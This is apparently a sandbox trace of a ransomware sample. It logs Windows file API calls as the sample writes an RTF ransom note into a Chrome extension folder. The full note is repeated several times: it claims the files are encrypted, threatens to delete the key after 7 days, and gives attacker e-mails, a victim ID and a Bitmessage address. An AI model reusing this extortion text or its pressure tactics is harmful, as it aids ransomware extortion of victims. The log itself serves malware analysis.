reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.195] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.195] CloseHandle (hObject=0x294) returned 1 [0278.195] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\#readme_eman#.rtf")) returned 0xffffffff [0278.196] GetLastError () returned 0x2 [0278.196] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_metadata\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.205] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. 